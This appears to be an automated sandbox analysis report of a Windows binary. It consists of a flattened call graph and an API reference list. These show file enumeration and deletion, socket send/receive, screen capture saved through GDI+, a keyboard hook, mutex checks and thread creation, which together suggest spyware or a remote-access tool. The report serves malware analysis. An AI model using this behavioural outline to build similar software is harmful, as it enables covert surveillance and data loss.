4777->4838 4850 405622 6 API calls 4777->4850 4778->4777 4780 403a9a 4 API calls 4779->4780 4781 405f38 4780->4781 4782 405f5d 4781->4782 4783 405f40 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4781->4783 4784 409046 3 API calls 4783->4784 4784->4782 4786 408ef1 4 API calls 4785->4786 4787 405d84 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4786->4787 4788 405dc1 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ExpandEnvironmentStringsA PathFileExistsA 4787->4788 4794 405daf ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4787->4794 4789 405df9 4788->4789 4788->4794 4791 40f234 9 API calls 4789->4791 4792 405e05 4791->4792 4792->4794 4795 405e2e ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 4792->4795 4793 403a9a 4 API calls 4796 405e2a 4793->4796 4794->4793 4797 405e64 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4795->4797 4798 405e42 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4795->4798 4796->4797 4797->4777 4799 403a9a 4 API calls 4798->4799 4799->4797 4801 405bc2 FindNextFileA 4800->4801 4802 405ba5 FindClose 4800->4802 4812 405bd4 4801->4812 4803 405ceb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4802->4803 4805 403a9a 4 API calls 4803->4805 4804 405d13 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4808 403a9a 4 API calls 4804->4808 4807 405cfb 4805->4807 4806 405cbc FindNextFileA 4806->4812 4809 405cfd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4807->4809 4810 405d32 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4808->4810 4811 405d4f 4809->4811 4810->4811 4811->4777 4812->4804 4812->4806 4813 405c59 7 API calls 4812->4813 4814 405cb2 GetLastError 4813->4814 4815 405cdc 4813->4815 4814->4806 4816 405cd1 FindClose 4814->4816 4815->4803 4816->4809 4818 40589d FindNextFileA 4817->4818 4819 40586e FindClose ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4817->4819 4821 405a58 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4818->4821 4828 4058b7 4818->4828 4820 403a9a 4 API calls 4819->4820 4822 405896 4820->4822 4823 403a9a 4 API calls 4821->4823 4824 405adc ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4822->4824 4825 405a77 FindClose ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4823->4825 4827 405a9d 4824->4827 4825->4827 4826 405a40 FindNextFileA 4826->4821 4826->4828 4827->4777 4828->4826 4829 40593b 10 API calls 4828->4829 4832 4059fe ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 4828->4832 4836 405ab2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4828->4836 4829->4828 4830 4059cd ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ DeleteFileA 4829->4830 4830->4828 4831 4059e1 GetLastError 4830->4831 4831->4828 4833 405aa2 FindClose 4831->4833 4832->4828 4834 405a12 GetLastError 4832->4834 4833->4824 4834->4828 4834->4833 4837 403a9a 4 API calls 4836->4837 4837->4833 4839 405786 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4838->4839 4840 40573c GetLastError 4838->4840 4843 403a9a 4 API calls 4839->4843 4841 405746 4840->4841 4842 40574d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4840->4842 4841->4842 4844 405749 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4841->4844 4847 403a9a 4 API calls 4842->4847 4843->4844 4849 4057b3 4844->4849 4848 40576d ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4847->4848 4848->4849 4849->4777 4851 405672 GetLastError 4850->4851 4852 4056bc ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4850->4852 4854 40567c 4851->4854 4857 405683 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4851->4857 4853 403a9a 4 API calls 4852->4853 4856 40567f ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4853->4856 4854->4856 4854->4857 4860 4056e9 4856->4860 4859 403a9a 4 API calls 4857->4859 4861 4056a3 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4859->4861 4860->4777 4861->4860 4863 402115 4862->4863 4864 40211a socket 4862->4864 4893 402141 WSAStartup 4863->4893 4865 40212c ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4864->4865 4865->4337 4868 40218d WSAGetLastError 4867->4868 4869 402189 4867->4869 4868->4869 4869->4350 4870->4366 4871->4366 4872->4366 4873->4366 4874->4366 4894 402504 7 API calls 4875->4894 4877 4021b2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4877->4370 4879 402245 malloc recv 4878->4879 4880 402264 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4879->4880 4881 4022ad free 4879->4881 4880->4881 4882 40229c 4880->4882 4881->4879 4884 4022b9 4881->4884 4900 4022ea ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@ 4882->4900 4885 4022cd ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4884->4885 4919 402791 4884->4919 4885->4372 4888 40437e 4887->4888 4889 404342 TerminateThread 4887->4889 4888->4372 4889->4888 4890 404353 CloseHandle 4889->4890 4890->4888 4891 404367 4890->4891 4891->4888 4892 40436d UnhookWindowsHookEx TerminateThread 4891->4892 4892->4888 4893->4864 4895 40256b ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send 4894->4895 4896 40258d ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4894->4896 4897 4025d8 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4895->4897 4898 402a2a 4 API calls 4896->4898 4897->4877 4899 4025af ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ send ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4898->4899 4899->4897 4901 40230a ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4900->4901 4902 402320 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4901->4902 4903 402357 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4901->4903 4904 402a2a 4 API calls 4902->4904 4905 402363 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4903->4905 4906 402342 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4904->4906 4923 4024b4 strncmp 4905->4923 4906->4905 4909 4024a4 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4909->4881 4910 402385 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4911 402496 ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4910->4911 4912 40239c ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 4910->4912 4911->4909 4913 4023b2 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ 4912->4913 4914 4023be 6 API calls 4912->4914 4913->4914 4915 402410 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4914->4915 4916 402428 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ CreateEventA CreateThread WaitForSingleObject 4914->4916 4918 402423 4915->4918 4917 40245c ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4916->4917 4917->4909 4917->4918 4918->4901 4918->4917 4920 4027a1 4919->4920 4921 402814 4919->4921 4920->4921 4922 4027ae 7 API calls 4920->4922 4921->4885 4922->4921 4924 40237a 4923->4924 4924->4909 4924->4910 4926 40e194 4925->4926 4927 40e17a 4925->4927 4928 401289 6 API calls 4926->4928 4929 40e185 GdiplusStartup 4927->4929 4930 40e1a2 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4928->4930 4929->4926 4931 401289 6 API calls 4930->4931 4932 40e1b4 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4931->4932 4933 40712f 37 API calls 4932->4933 4934 40e1c8 6 API calls 4933->4934 4943 40e220 4934->4943 4935 401289 6 API calls 4937 40e22f ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 4935->4937 4936 40e267 10 API calls 4939 401289 6 API calls 4936->4939 4940 40f4a3 43 API calls 4937->4940 4938 401289 6 API calls 4941 40e3c4 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4938->4941 4942 40e30a ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4939->4942 4940->4943 4944 40e3da Sleep 4941->4944 4945 40e317 6 API calls 4942->4945 4946 40e36e ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 4942->4946 4943->4935 4943->4936 4943->4938 4947 40e24c Sleep 4943->4947 4953 401289 6 API calls 4943->4953 4944->4943 4948 40e381 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4945->4948 4946->4948 4947->4943 4949 40f44c 3 API calls 4948->4949 4950 40e390 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4949->4950 4965 40decb ??2@YAPAXI mbstowcs 4950->4965 4954 40e3eb ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ atoi 4953->4954 4954->4944 4957 401289 6 API calls 4956->4957 4958 4018e0 8 API calls 4957->4958 5036 40f978 RegisterClassExA 4959->5036 4962 40f951 GetMessageA 4963 40f974 4962->4963 4964 40f957 TranslateMessage DispatchMessageA 4962->4964 4964->4962 4998 40d71e CreateDCA CreateCompatibleDC GetDeviceCaps GetDeviceCaps CreateCompatibleBitmap 4965->4998 4968 40df14 LoadLibraryA GetProcAddress 4969 40df2d ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4968->4969 4970 40df47 4969->4970 5011 40dd42 4970->5011 4976 40df6f 5028 40fc2c free 4976->5028 4978 40df75 4979 401289 6 API calls 4978->4979 4980 40df82 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4979->4980 4981 40df93 ??0?$basic_ifstream@DU?$char_traits@D@std@@@std@@QAE@PBDH ?is_open@?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4980->4981 4982 40e11d 4980->4982 4983 40e111 ??_D?$basic_ifstream@DU?$char_traits@D@std@@@std@ 4981->4983 4984 40dfba ?tellg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAE?AV?$fpos@H@2 4981->4984 5033 40dda1 GdipDisposeImage 4982->5033 4983->4982 5029 405288 4984->5029 4987 40e125 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 4987->4943 4988 40dfdc ??2@YAPAXI ?seekg@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@JW4seekdir@ios_base@2@ 5030 405288 4988->5030 4990 40dffb ?read@?$basic_istream@DU?$char_traits@D@std@@@std@@QAEAAV12@PADH ?close@?$basic_ifstream@DU?$char_traits@D@std@@@std@ DeleteFileA ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 4991 40e040 4990->4991 4992 402a2a 4 API calls 4991->4992 4993 40e059 4992->4993 5031 40fc2c free 4993->5031 4995 40e05f 8 API calls 5032 405288 4995->5032 4997 40e0d0 6 API calls 4997->4983 4999 40d775 SelectObject 4998->4999 5009 40d76d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@ 4998->5009 5001 40d78b StretchBlt 4999->5001 4999->5009 5002 40d7b2 GetObjectA 5001->5002 5001->5009 5004 40d7cd LocalAlloc 5002->5004 5002->5009 5003 40d991 5003->4968 5003->4969 5006 40d848 GlobalAlloc 5004->5006 5007 40d83e 5004->5007 5008 40d891 GetDIBits 5006->5008 5006->5009 5007->5006 5008->5009 5010 40d8bd 15 API calls 5008->5010 5009->5003 5010->5003 5012 40dd66 GdipLoadImageFromStream 5011->5012 5013 40dd5f GdipLoadImageFromStreamICM 5011->5013 5014 40dd6b 5012->5014 5013->5014 5015 40d999 5014->5015 5034 40da32 GdipGetImageEncodersSize 5015->5034 5017 40d9b6 5018 40d9bd malloc 5017->5018 5020 40d9cd 5017->5020 5019 40d9d2 5018->5019 5018->5020 5035 40da42 GdipGetImageEncoders 5019->5035 5026 40e133 GdipSaveImageToFile 5020->5026 5022 40d9de 5023 40da0b free 5022->5023 5025 40d9ec wcscmp 5022->5025 5023->5020 5025->5022 5025->5023 5027 40e152 5026->5027 5027->4976 5028->4978 5029->4988 5030->4990 5031->4995 5032->4997 5033->4987 5034->5017 5035->5022 5037 40f8e4 ExtractIconA lstrcpynA Shell_NotifyIconA 5036->5037 5038 40f9c9 CreateWindowExA 5036->5038 5037->4962 5038->5037 5039 40f9e3 GetLastError 5038->5039 5039->5037

                              Executed Functions

                              Function 00407452 Relevance: 179.1, APIs: 93, Strings: 9, Instructions: 645threadsynchronizationCOMMON
                              Download Yara Rule

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 0 407452-40750e call 407c53 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 40efb5 call 408510 call 401b3c call 401289 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ * 2 OpenMutexA 11 407510-407516 WaitForSingleObject 0->11 12 40751c-40753d ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e97 0->12 11->12 15 40755a-40758e call 401289 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateMutexA GetLastError 12->15 16 40753f-407557 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 409132 12->16 21 407590-407593 15->21 22 407598-4075ec call 407d38 call 401000 GetModuleFileNameA call 408ef1 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ call 40f0b5 15->22 16->15 23 407c41-407c50 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 21->23 32 4075f5 22->32 33 4075ee-4075f3 22->33 34 4075fa-407609 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 32->34 33->34 35 407612-407615 34->35 36 40760b-40760d 34->36 37 407683-407697 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 35->37 38 407617-40762b call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 35->38 36->35 45 407699 call 4084b8 37->45 46 40769e-40775b call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 37->46 38->37 44 40762d-407633 38->44 44->37 47 407635-40763b 44->47 45->46 72 4077c3-4077c6 46->72 73 40775d-40777a call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 46->73 50 40765c-40767c ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e4e 47->50 51 40763d-407653 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI@Z 47->51 50->37 61 40767e call 402a78 50->61 51->37 53 407655-40765a call 402b5b 51->53 53->37 61->37 75 4077cc-4077e0 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 72->75 76 40795e-407984 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi 72->76 73->72 80 40777c-4077bd call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 73->80 86 4077e2-407857 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40650d 75->86 87 407859-407865 ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z 75->87 83 407986-407988 76->83 84 40798a-40798c 76->84 80->72 88 40798f-40799f call 40faed CreateThread 83->88 89 4079a1-4079df call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z call 401289 ??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 84->89 90 40798e 84->90 92 40786b-40788b ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 408e4e 86->92 87->92 88->89 117 4079e1-407a20 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z 89->117 118 407a25-407abf call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ CreateDirectoryA call 401289 ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 89->118 90->88 107 407891-407919 ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ??2@YAPAXI@Z ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 4090d0 call 40fc2c 92->107 108 40791b-407934 call 401289 ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z 92->108 107->108 108->76 122 407936-407955 call 401289 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 407e0b 108->122 145 407ac2-407ad2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 117->145 118->145 122->76 144 407957 122->144 144->76 148 407af2-407b06 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 403774 145->148 149 407ad4-407ad5 145->149 152 407b0b-407b1f call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 148->152 151 407ad7-407af0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z call 4037d4 149->151 149->152 151->152 157 407b21-407b2b CreateThread 152->157 158 407b2d-407b41 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 152->158 157->158 161 407b50-407b64 call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 158->161 162 407b43-407b4e CreateThread 158->162 165 407b66-407bb7 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 40712f ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ CreateThread 161->165 166 407bb9-407bcd call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ 161->166 162->161 165->166 172 407c08-407c2e call 40e549 ??4?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ 166->172 173 407bcf-407c07 call 401289 ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ atoi call 401289 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ call 405f6c 166->173 180 407c30 172->180 181 407c33-407c3b call 409e73 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ 172->181 173->172 180->181 181->23
                              APIs
                                • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407C76
                                • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,00000000,?,00000000), ref: 00407CA2
                                • Part of subcall function 00407C53: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00407CAE
                                • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407CB7
                                • Part of subcall function 00407C53: malloc.MSVCRT ref: 00407CC8
                                • Part of subcall function 00407C53: free.MSVCRT(?,?,?,?,dt@,00000000), ref: 00407D13
                                • Part of subcall function 00407C53: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407D21
                                • Part of subcall function 00407C53: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407D2A
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00407473
                              • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00407482
                                • Part of subcall function 0040EFB5: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFC4
                                • Part of subcall function 0040EFB5: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00407491,?), ref: 0040EFDB
